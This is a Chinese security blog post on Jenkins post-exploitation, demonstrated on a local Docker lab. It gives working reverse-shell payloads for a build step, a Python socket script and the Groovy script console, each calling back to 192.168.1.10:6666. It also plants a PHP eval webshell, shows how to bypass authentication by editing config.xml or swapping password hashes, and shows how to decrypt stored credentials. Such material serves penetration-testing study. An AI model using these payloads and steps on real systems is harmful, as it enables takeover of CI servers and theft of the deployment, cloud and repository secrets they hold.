浅谈jenkins后渗透

最新推荐文章于 2024-07-27 13:25:11 发布
最新推荐文章于 2024-07-27 13:25:11 发布
阅读量1.1k 收藏 18
点赞数 15
分类专栏: 漏洞复现 文章标签: jenkins 安全 网络安全 web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/milu_Sec/article/details/135319619
版权

何为jenkins

jenkins是一个自动化服务器,支持开发者在软件开发过程中自动化各种任务,如构建、测试和部署应用程序,里面会存放一些账号密码,例如

1.登录到服务器、数据库(SQL Server、MySQL、PostgreSQL)、容器平台(Docker)或云服务(AWS、Azure)的账号和密码

2.Git、Subversion 等版本控制系统的账号和密码或访问令牌

3.邮件服务器、Slack、或其他通信平台的登录凭据

安装jenkins

docker pull jenkinsci/blueocean

mkdir -p /usr/local/jenkins

chmod 777 /usr/local/jenkins

docker run -d -p 8099:8080 -p 50099:50000 -v /usr/local/jenkins:/var/jenkins_home --name myjenkins jenkinsci/blueocean

docker ps

 docker exec -it 1db /bin/bash

 cat /var/jenkins_home/secrets/initialAdminPassword

图片

图片

访问8099端口把密钥粘贴进去

图片

安装以后创建账号,登录

图片

替换用户hash登录

在/usr/local/jenkins/users目录

图片

把下图里的密码改为如下(对应密码abc-123)

<passwordHash>#jbcrypt:$2a$10$PerJswtfjaa6ukA1t0K/ueUK5CI3rjA1.XUx4wCQt88dhihfxObBW</passwordHash>

图片

重启jenkins然后登录,利用完在改回来

admin密码目录jenkins/users/admin,操作和替换的字符串同上

免登录配置

jenkins目录下有个config.xml文件,如下图的三个地方改为如下

图片

  • 将 <useSecurity> 设置为 false,

  • 设置为 class="hudson.security.AuthorizationStrategy$Unsecured"

  • 将 

    设置为 class="hudson.security.SecurityRealm$None"

重启该容器

图片

再访问发现不用登录就可访问

图片

getshell手法

1.创建一个任务,如下图配置

图片

#!/bin/bash# ... 其他脚本内容 .../bin/bash -i >& /dev/tcp/192.168.1.10/6666 0>&1

立即构建,弹回来了

图片

2.安装Terminal Plugin

3.wget下载py脚本然后执行,此办法不需要root权限


def pythonScript = """
import socket, subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.10", 6666))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/sh", "-i"])

4.脚本命令行


// 创建两个 StringBuffer 对象来收集标准输出和标准错误流的内容
def sout = new StringBuffer(), serr = new StringBuffer()

// 将[INSERT COMMAND]'替换为要执行的系统命令
// '.execute()' 方法会在操作系统层面执行这个命令
def proc = '/bin/bash -i >& /dev/tcp/192.168.1.10/6666 0>&1'.execute()

// 'consumeProcessOutput' 方法将命令的标准输出和错误输出重定向到前面创建的 StringBuffer 对象中
proc.consumeProcessOutput(sout, serr)

// 'waitForOrKill(1000)' 会等待进程执行完毕,或者在 1000 毫秒(1 秒)后杀死进程
proc.waitForOrKill(1000)

// 打印出标准输出和错误
println "out> $sout err> $serr"

图片

5.网站存在web php服务

new File("/var/www/html/media.php").write('<?php @eval($_POST[s3cpu1se]);?>');

def webshell = '<?php @eval($_POST[s3cpu1se]);?>'

new File("/var/www/html/media.php").write("$webshell");

解密jenkins密码

1.${JENKINS_HOME}/credentials.xml里会存放用于不同任务和插件的加密凭据数据,可能包括用户名和密码、SSH 私钥、秘密文本、API 令牌,形如如下格式

<passphrase>{AAAAAAAAAAAANzxft/rDzyt8mhxpn3O72dxvVqZksL5vBJ4jNKvAjAA=}</passphrase>

使用 hudson.util.Secret.fromString("明文密码").getEncryptedValue() 加密

文件地址

$JENKINS_HOME/credentials.xml 
$JENKINS_HOME/secrets/master.key
$JENKINS_HOME/secrets/hudson.util.Secret
$JENKINS_HOME/jobs/example-folder/config.xml

单个票据解密,先管理员登录,然后在/script里解密

println(hudson.util.Secret.decrypt("{XXX=}"))

抑或

println(hudson.util.Secret.decrypt("{XXX=}"))

或者工具

 https://github.com/hoto/jenkins-credentials-decryptor 

命令


./jenkins-credentials-decryptor \
  -m $JENKINS_HOME/secrets/master.key \
  -s $JENKINS_HOME/secrets/hudson.util.Secret \
  -c $JENKINS_HOME/credentials.xml \
  -o json

2.如果用publish_over_ssh插件,密码会存放与

${JENKINS_HOME}/jenkins.plugins.publish_over_ssh.BapSshPublisherPlugin.xml 

解密工具

https://github.com/rabbitmask/Jenkins_Credentials_Crack

希望各位读者看完我们的文章以后自己去实践一下,只有学到脑子里的东西才是自己的,如果遇到困难,可以加本人微信(i_still_be_milu)与麋鹿师傅一起探讨,炼心之路,就在脚下,我们一起成长。

同时欢迎各位同仁关注麋鹿安全,我们的文章会第一时间发布在公众号平台,如果不想错过我们新鲜出炉的好文,那就请扫码关注我们的公众号!(附上本人微信,欢迎各位同仁加我微信,和我探讨安全,同时欢迎同仁们的不吝指正)

img

图片

麋鹿安全
关注
专栏目录
jenkins老版本资源
11-09
完成后,Jenkins 可以生成报告并通知团队构建结果,从而提高开发效率和代码质量。 6. 版本回溯和升级策略:在使用 Jenkins 的老版本时,应考虑版本回溯的风险,比如安全漏洞和失去新功能。如果有必要升级,应该先在...
Jenkins凭据导出
Dancen的专栏
06-09 1621
Jenkins在调用svn、ssh等第三方工具时需要账号密码等信息。如果在调用第三方工具时在流水线脚本中直接传递这些敏感信息,既不方便,也有安全隐患。基于此,Jenkins可以将这些敏感信息存储为凭据,然后在项目中通过凭据ID引用,安全且便于复用。作为Jenkins管理员,某些情况下你可能面临账号密码等信息遗失的情况,或者你压根不知道其中的某些敏感信息,例如该信息由另外的系统管理员配置。此时,由于信息已被加密,你无法通过Jenkins的凭据管理直接查看到相关信息。如果需要查看这些敏感信息,需要借助Jenki
jenkins 查看凭证密码以及重置admin密码的操作方法
qq_30436011的博客
11-09 5090
通过项目生成自定义密码, 只需要在该项目生成的hash值里面加上#jbcrypt:之后再去替换中的值就行。
渗透测试】Jenkins远程命令执行漏洞(CVE-2018-1000861)
最新发布
网络安全从业者的学习笔记
07-27 554
Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。
不同jenkins下的凭据合并迁移
a910196454的博客
09-28 1165
有个需求需要将老的jenkins下的job和凭据迁移到新jenkins上。因为2套jenkins的内容不通,所以凭据加解密的密钥也不同,没办法直接将credentials.xml文件下的凭据内容直接复制追加到新jenkins的credentials.xml文件内(该存储凭据的文件在$JENKINS_HOME/目录下)。 找了下资料(下面链接),由于python3和依赖没有装,用了粗糙的方法。直接通过脚本批量获取了待解密的密码串,然后通过管理员权限登入jenkins平台,在系统管理》...
Jenkins弱口令RCE复现渗透测试
kelenwait的博客
06-20 2976
简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。 漏洞复现 1.jenkins存在默认口令使用弱口令登录 admin/admin123 2.找到 Manage Jenkins -Tools and Actions - Script Console 点击
红队打靶:JARBAS详细打靶思路(vulnhub)
Bossfrank的博客
06-03 2037
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
jenkins全套插件
05-14
jenkins离线安装全套插件,包含war包和jenkins适配的常用插件。只需要下载解压,运行jenkins.war,然后将plugins复制到jenkins_home目录下,一般都是/root/.jenkins
Jenkins打包配置文件
03-11
Jenkins是一款开源的持续集成(Continuous Integration,简称CI)服务器,它可以帮助开发团队自动化软件构建、测试和部署的过程。在“Jenkins打包配置文件”这个主题中,我们主要讨论的是如何管理和配置Jenkins来...
Jenkins打包插件配置
03-12
假设我们使用Maven Integration Plugin进行Java应用打包,我们需要在Jenkins配置页面指定Maven的版本,添加构建步骤如`mvn clean package`,并配置Artifact Deployer Plugin将打包后的WAR文件部署到Nexus仓库。...
Jenkins安卓客户端
04-19
2. **连接Jenkins服务器**:安装完成后,首次启动客户端需要配置Jenkins服务器的URL,以及认证信息(如果服务器配置了安全策略)。 3. **同步项目**:一旦连接成功,客户端会自动同步Jenkins服务器上的项目列表,...
jenkins-credentials-decryptor:用于转储Jenkins凭证的命令行工具
05-18
詹金斯凭证解密器 用于解密和转储Jenkins凭证的命令行工具。 这是怎么回事 Jenkins将加密的凭据存储在credentials.xml文件或文件夹下的config.xml 。 要解密它们,您需要master.key和hudson.util.Secret文件。 所有文件都位于Jenkins主目录中: $JENKINS_HOME/credentials.xml $JENKINS_HOME/secrets/master.key $JENKINS_HOME/secrets/hudson.util.Secret $JENKINS_HOME/jobs/example-folder/config.xml - Possible location 兼容性 我已经在Jenkins 1.625.1和2.141上进行了测试 使用二进制文件运行 苹果电脑: brew install hoto/r
jenkins-credentials-decryptor-demo:测试项目是否有害
02-27
詹金斯凭证解密器 用于解密和转储Jenkins凭证的命令行工具。 这是怎么回事 Jenkins将加密的凭据存储在credentials.xml文件中。 要解密它们,您需要master.key和hudson.util.Secret文件。 这三个文件都位于Jenkins主目录中: $JENKINS_HOME/credentials.xml $JENKINS_HOME/secrets/master.key $JENKINS_HOME/secrets/hudson.util.Secret 兼容性 我已经在Jenkins 1.625.1和2.141上进行了测试 使用二进制文件运行 苹果电脑: brew install hoto/repo/jenkins-credentials-decryptor Mac或Linux: curl -L \ "https://github.com/hoto
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
黑剑
03-05 6784
本文将深入研究一项涉及Jenkins安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell。
Jenkins未授权 反弹shell
weixin_39664643的博客
06-23 1798
Jenkins 未授权 反弹shell 漏洞原理: 通过msfvenom生成python后门并执行,反弹shell 漏洞环境: 攻击: kali 192.168.109.128 目标:Win10 默认安装 jenkins jenkins清华镜像 在Windows平台安装Jenkins:默认部分插件有可能因为网络安装失败,不影响漏洞复现~ 复现步骤: 所有步骤均在kali中完成 Kali中使用MSF生成python后门s.py,并在此目录开启web服务 msfvenom -p python/meter
JARBAS - Jenkins渗透原理详解
2301_82000839的博客
05-31 860
打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息80优先思路、22ssh爆破放最后普通扫目录无信息、根据网站信息猜测、再指定扫描测试对编码进行hash-id识别、解码、利用信息尝试登录要么是ssh登录、要么是8080的登录;进行尝试进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限写入poc;5分钟自动进入了root权限。
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 604
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
利用Jenkins未授权获取服务器权限--Docker还来干扰--一次渗透的经历
weixin_30270889的博客
08-13 632
Jenkins获取权限的过程 Jenkins存在未授权访问漏洞 Jenkins存在未授权访问漏洞,且项目具有读取权限,通过项目的日志获取到一个账号密码,尝试登录成功,打开控制台成功。 备注:控制台一般可以进去后直接URL输入http://a.b.c.d/script 即可进入 执行命令尝试反弹shell 在对话框中尝试反弹shell,本地NC监听中,发行不行,尝试ping回来,发现网...
安全研究 | Jenkins 任意文件读取漏洞分析
weixin_33807284的博客
07-31 301
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由云鼎实验室 发表于云+社区专栏 一、漏洞背景 漏洞编号:CVE-2018-1999002 漏洞等级:高危 Jenkins 7 月 18 日的安全通告修复了多个漏洞,其中 SECURITY-914 是由 Orange (博客链接:blog.orange.tw/)挖出的 Jenkins 未授权任意文件读取漏洞。 **腾讯安全云鼎实...
metasploit渗透jenkins
09-01
在Metasploit中,有一些模块可以用于渗透测试Jenkins。其中之一是Jenkins枚举模块(auxiliary/scanner/http/jenkins_enum),它可以用于扫描Jenkins服务器并收集相关信息。使用该模块时,你需要设置目标主机的IP地址(RHOSTS)和端口号(RPORT),以及目标URI(TARGETURI)。然后运行该模块,它将扫描目标主机并输出结果。 在Metasploit的第2章中,介绍了Metasploit的基础知识和术语,包括如何安装和利用漏洞。如果你对Metasploit还不熟悉,建议你仔细阅读该章节以获取更多详细信息。 除了Jenkins枚举模块,Metasploit还提供了其他一些信息收集模块,包括DNS记录扫描和枚举模块。你可以继续探索和学习这些模块,以增强你的Metasploit技能。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Metasploit 渗透测试手册第三版 第二章 信息收集与扫描(翻译)](https://blog.csdn.net/weixin_34186950/article/details/91427380)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Web渗透测试实战:基于Metasploit 5.0](https://blog.csdn.net/hzbooks/article/details/123815157)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值